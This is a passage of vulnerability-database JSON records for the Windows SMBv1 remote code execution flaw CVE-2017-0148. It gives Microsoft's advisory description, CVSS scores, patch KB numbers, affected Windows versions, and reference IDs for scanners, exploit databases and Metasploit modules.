"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T18:46:16", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-05T18:46:16", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB3210720", "KB3210721", "KB3212646", "KB4013198", "KB4013429", "KB4012217", "KBMS16-110, 
3187754", "KB4012216", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3205409", "KB4012215", "KB3177186", "KB4012213", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:46:16", "differentElements": ["msAffectedSoftware"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T20:48:26", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T20:48:26", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-05T20:48:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB4013429", "KB3210720", "KB4012215", "KB3213986", "KB4012217", "KB4012598", "KB3205409", "KB3177186", "KB4012606", "KB4012214", "KB4012212", "KB3210721", "KB4012216", "KB3205401", "KB3212646", "KB4012213", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:48:26", "differentElements": ["msAffectedSoftware"], "edition": 14}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T10:43:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T10:43:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-06T10:43:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012606", "KB4012598", "KB4012215", "KB4012217", "KB3213986", "KB3205401", "KB3177186", 
"KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB4012212", "KB3210720", "KB4012214", "KB3212646", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
